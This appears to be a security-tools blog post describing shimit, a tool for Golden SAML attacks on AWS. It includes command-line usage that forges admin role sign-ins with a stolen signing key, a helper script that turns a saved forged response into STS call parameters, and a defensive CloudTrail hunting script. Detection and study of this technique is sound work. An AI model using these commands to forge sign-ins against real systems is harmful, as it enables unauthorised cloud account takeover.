Pentest Tools

Published on January 7th, 2018


shimit – A tool that implements the Golden SAML attack


shimit is a Python tool that implements the Golden SAML attack. More information on the attack can be found in the accompanying article on our blog.

python .\shimit.py -h
usage: shimit.py [-h] -pk KEY [-c CERT] [-sp SP] -idp IDP -u USER [-reg REGION]
                 [--SessionValidity SESSION_VALIDITY] [--SamlValidity SAML_VALIDITY] -n SESSION_NAME
                 -r ROLES -id ARN [-o OUT_FILE] [-l LOAD_FILE] [-t TIME]

Overview
In a Golden SAML attack, an attacker who holds the identity provider's token-signing private key can forge SAML responses and gain access to any application that trusts that identity provider (any application that supports SAML authentication), as any user and with any privileges they desire. The forged response is presented to the service provider directly, so the identity provider and its controls (password policy, MFA, logging) are never involved in the sign-in.
shimit allows the user to create a signed SAMLResponse object and use it to open a session in the Service Provider. shimit currently supports the AWS Console as a Service Provider; more are in the works...

AWS
After generating and signing the SAMLResponse's assertion, shimit calls the AssumeRoleWithSAML() API in AWS STS, which validates the signature against the certificate registered on the IAM SAML provider and returns temporary credentials for the requested role. The session token and keys are then applied to a new session, where the user can use the AWS CLI to perform actions with the permissions obtained through the Golden SAML.
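The defender's counterpart to the flow above is a check on the AWS side. Because a forged response never touches the identity provider, every AssumeRoleWithSAML call in CloudTrail should line up with a token the IdP actually issued shortly before; one that does not, or that asks for a longer session than the IdP ever grants, deserves a look. The following script is an added example and not part of shimit. The CloudTrail records are constructed (field names are the ones a real AssumeRoleWithSAML event carries, values are the README's placeholders), and the shape of the IdP issuance records is an assumption: build them from your AD FS audit log (event 1200, "The Federation Service issued a valid token"), keeping the issued RoleSessionName claim so it matches CloudTrail's userName.

```python
"""Hunt for Golden SAML use against AWS: AssumeRoleWithSAML calls in CloudTrail
that the identity provider never issued a token for.

Added example, not part of shimit. All records below are constructed.
"""
import json
from datetime import datetime, timedelta, timezone


def _t(value):
    """CloudTrail / ISO-8601 'Z' timestamp to an aware UTC datetime."""
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


# Constructed CloudTrail records: one legitimate federated sign-in, one
# unrelated console login, and one forged-assertion sign-in.
CLOUDTRAIL_LINES = [
    json.dumps({
        "eventTime": "2018-01-07T10:00:05Z", "eventSource": "sts.amazonaws.com",
        "eventName": "AssumeRoleWithSAML", "sourceIPAddress": "203.0.113.10",
        "userIdentity": {"type": "SAMLUser", "userName": "admin@domain.com",
                         "identityProvider": "http://adfs.lab.local/adfs/services/trust"},
        "requestParameters": {"roleArn": "arn:aws:iam::123456789012:role/ADFS-monitor",
                              "principalArn": "arn:aws:iam::123456789012:saml-provider/ADFS",
                              "sAMLAssertionID": "_idp-issued-1", "durationSeconds": 3600}}),
    json.dumps({
        "eventTime": "2018-01-07T11:12:00Z", "eventSource": "signin.amazonaws.com",
        "eventName": "ConsoleLogin", "sourceIPAddress": "203.0.113.10",
        "userIdentity": {"type": "IAMUser", "userName": "ops-user"},
        "requestParameters": None}),
    json.dumps({
        "eventTime": "2018-01-07T13:30:00Z", "eventSource": "sts.amazonaws.com",
        "eventName": "AssumeRoleWithSAML", "sourceIPAddress": "198.51.100.7",
        "userIdentity": {"type": "SAMLUser", "userName": "admin@domain.com",
                         "identityProvider": "http://adfs.lab.local/adfs/services/trust"},
        "requestParameters": {"roleArn": "arn:aws:iam::123456789012:role/ADFS-admin",
                              "principalArn": "arn:aws:iam::123456789012:saml-provider/ADFS",
                              "sAMLAssertionID": "_forged-1", "durationSeconds": 43200}}),
]

# Constructed IdP token-issuance records (shape is an assumption, see lead-in).
IDP_ISSUED_TOKENS = [
    {"time": "2018-01-07T09:59:40Z", "session_name": "admin@domain.com",
     "relying_party": "urn:amazon:webservices"},
]


def saml_logins(lines):
    """Yield only the STS AssumeRoleWithSAML events from raw CloudTrail lines."""
    for line in lines:
        ev = json.loads(line)
        if ev.get("eventSource") == "sts.amazonaws.com" and ev.get("eventName") == "AssumeRoleWithSAML":
            yield ev


def find_golden_saml(lines, idp_tokens, window=timedelta(minutes=5), max_idp_duration=3600):
    """Return a finding for every SAML sign-in with no IdP token issued for that
    session name inside `window` before it, or whose requested duration exceeds
    the longest session the IdP is configured to grant (`max_idp_duration`)."""
    findings = []
    for ev in saml_logins(lines):
        when = _t(ev["eventTime"])
        user = ev["userIdentity"]["userName"]
        req = ev["requestParameters"]
        issued = any(r["session_name"] == user and when - window <= _t(r["time"]) <= when
                     for r in idp_tokens)
        reasons = []
        if not issued:
            reasons.append("no IdP token issued for this user in the preceding %d s"
                           % window.total_seconds())
        if req.get("durationSeconds", 0) > max_idp_duration:
            reasons.append("durationSeconds %d exceeds what the IdP issues" % req["durationSeconds"])
        if reasons:
            findings.append({"assertion_id": req.get("sAMLAssertionID"), "user": user,
                             "role": req["roleArn"], "source_ip": ev["sourceIPAddress"],
                             "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_golden_saml(CLOUDTRAIL_LINES, IDP_ISSUED_TOKENS):
        print(json.dumps(f, indent=2))
```

The session name is attacker-chosen (shimit's -n), so an attacker can copy a real user's name; the time correlation still holds because the IdP never processed the request. In practice also compare the IdP's own SessionDuration claim with the durationSeconds that STS was asked for, and alert on AssumeRoleWithSAML from source addresses that never appear in the IdP's logs.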

Requirements:
For installing the required modules, run the following command:

python -m pip install boto3 botocore defusedxml enum python_dateutil lxml signxml

AWS CLI
Needs to be installed in order to use the credentials obtained; installers are available for Windows and Linux.

Usage:

Apply session for AWS CLI

python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -c cert_file -u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012

idp - Identity Provider URL, e.g. http://server.domain.com/adfs/services/trust (this becomes the Issuer of the forged response)
pk - Full path of the identity provider's token-signing private key (PEM format)
c - Full path of the matching certificate (PEM format)
u - User and domain name, e.g. domain\username (escape the backslash as \\ or quote the value on *nix shells)
n - Session name in AWS (the RoleSessionName carried in the assertion)
r - Desired roles in AWS. Multiple roles may be listed; the first one specified is the one assumed.
id - AWS account id, e.g. 123456789012


Save SAMLResponse to file

python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -c cert_file -u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012 -o saml_response.xml

o - Write the encoded SAMLResponse to the specified file path

Load SAMLResponse from file

python .\shimit.py -l saml_response.xml

l - Load a previously saved SAMLResponse from the specified file path
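The file written by -o and read back by -l is the base64-encoded SAMLResponse that gets posted to STS. The script below, an added example that is not part of shimit, decodes such a file and pulls out exactly what the AssumeRoleWithSAML() call described in the AWS section consumes: the role/provider ARN pair from the Role attribute (AWS accepts the pair in either order), the session name and duration attributes, and the Conditions that STS checks on top of the signature. The embedded response is a constructed, unsigned stand-in (a real forged one carries a ds:Signature over the Assertion); the account id, IdP URL and role names are the README's placeholders, and the saml-provider name "ADFS" is an assumption.

```python
"""Decode a shimit-style saved SAMLResponse and derive the arguments that
boto3's sts.assume_role_with_saml() takes from it.

Added example, not part of shimit. The sample response is constructed.
"""
import base64
import xml.etree.ElementTree as ET
from datetime import datetime, timezone

NS = {"samlp": "urn:oasis:names:tc:SAML:2.0:protocol",
      "saml": "urn:oasis:names:tc:SAML:2.0:assertion"}
ROLE_ATTR = "https://aws.amazon.com/SAML/Attributes/Role"
SESSION_NAME_ATTR = "https://aws.amazon.com/SAML/Attributes/RoleSessionName"
DURATION_ATTR = "https://aws.amazon.com/SAML/Attributes/SessionDuration"
AWS_AUDIENCE = "https://signin.aws.amazon.com/saml"

# Constructed, unsigned stand-in for the decoded contents of an -o file.
# The second Role value deliberately lists provider first to show that either
# order is accepted.
SAMPLE_RESPONSE_XML = """<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"
    xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" Version="2.0">
  <saml:Issuer>http://adfs.lab.local/adfs/services/trust</saml:Issuer>
  <saml:Assertion Version="2.0" ID="_constructed-sample">
    <saml:Issuer>http://adfs.lab.local/adfs/services/trust</saml:Issuer>
    <saml:Subject><saml:NameID>domain\\admin</saml:NameID></saml:Subject>
    <saml:Conditions NotBefore="2018-01-07T10:00:00Z" NotOnOrAfter="2018-01-07T10:05:00Z">
      <saml:AudienceRestriction><saml:Audience>https://signin.aws.amazon.com/saml</saml:Audience></saml:AudienceRestriction>
    </saml:Conditions>
    <saml:AttributeStatement>
      <saml:Attribute Name="https://aws.amazon.com/SAML/Attributes/Role">
        <saml:AttributeValue>arn:aws:iam::123456789012:role/ADFS-admin,arn:aws:iam::123456789012:saml-provider/ADFS</saml:AttributeValue>
        <saml:AttributeValue>arn:aws:iam::123456789012:saml-provider/ADFS,arn:aws:iam::123456789012:role/ADFS-monitor</saml:AttributeValue>
      </saml:Attribute>
      <saml:Attribute Name="https://aws.amazon.com/SAML/Attributes/RoleSessionName">
        <saml:AttributeValue>admin@domain.com</saml:AttributeValue>
      </saml:Attribute>
      <saml:Attribute Name="https://aws.amazon.com/SAML/Attributes/SessionDuration">
        <saml:AttributeValue>3600</saml:AttributeValue>
      </saml:Attribute>
    </saml:AttributeStatement>
  </saml:Assertion>
</samlp:Response>"""
# What the -o file itself holds: the response, base64-encoded.
SAMPLE_ENCODED = base64.b64encode(SAMPLE_RESPONSE_XML.encode()).decode()


def decode_response(encoded):
    """Base64-decode a saved SAMLResponse and return the samlp:Response element."""
    return ET.fromstring(base64.b64decode(encoded))


def attribute_values(assertion, name):
    """All AttributeValue texts of the saml:Attribute with the given Name."""
    for attr in assertion.findall("saml:AttributeStatement/saml:Attribute", NS):
        if attr.get("Name") == name:
            return [v.text.strip() for v in attr.findall("saml:AttributeValue", NS)]
    return []


def assume_role_params(encoded, role_index=0):
    """Keyword arguments for sts.assume_role_with_saml(). The session name is
    not a parameter: STS takes it from the RoleSessionName attribute. Like
    shimit, the first listed role is assumed unless role_index says otherwise."""
    assertion = decode_response(encoded).find("saml:Assertion", NS)
    pair = [p.strip() for p in attribute_values(assertion, ROLE_ATTR)[role_index].split(",")]
    params = {"RoleArn": next(p for p in pair if ":role/" in p),
              "PrincipalArn": next(p for p in pair if ":saml-provider/" in p),
              "SAMLAssertion": encoded}
    duration = attribute_values(assertion, DURATION_ATTR)
    if duration:
        params["DurationSeconds"] = int(duration[0])
    return params


def _parse_time(value):
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def condition_problems(encoded, now_utc):
    """What STS rejects besides a bad signature: an audience other than the AWS
    sign-in endpoint, or a NotBefore/NotOnOrAfter window that excludes now_utc
    (an aware datetime or an ISO-8601 'Z' string)."""
    if isinstance(now_utc, str):
        now_utc = _parse_time(now_utc)
    conditions = decode_response(encoded).find("saml:Assertion/saml:Conditions", NS)
    problems = []
    audiences = [a.text for a in conditions.findall("saml:AudienceRestriction/saml:Audience", NS)]
    if AWS_AUDIENCE not in audiences:
        problems.append("audience is not %s" % AWS_AUDIENCE)
    if now_utc < _parse_time(conditions.get("NotBefore")):
        problems.append("assertion not yet valid")
    if now_utc >= _parse_time(conditions.get("NotOnOrAfter")):
        problems.append("assertion expired")
    return problems


if __name__ == "__main__":
    shown = {k: v for k, v in assume_role_params(SAMPLE_ENCODED).items() if k != "SAMLAssertion"}
    print(shown)
    print(condition_problems(SAMPLE_ENCODED, datetime.now(timezone.utc)))
```

Note what is absent from the checks: nothing here, and nothing in STS, consults the identity provider. The validity window (shimit's --SamlValidity) only has to contain the moment of the call, and the DurationSeconds the attacker requests can be as long as the role's maximum session duration allows regardless of the IdP's own session policy.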

Contributions
shimit supports AWS as a service provider at the moment, as a proof of concept. We highly encourage you to contribute new modules for other service providers.

Download shimit
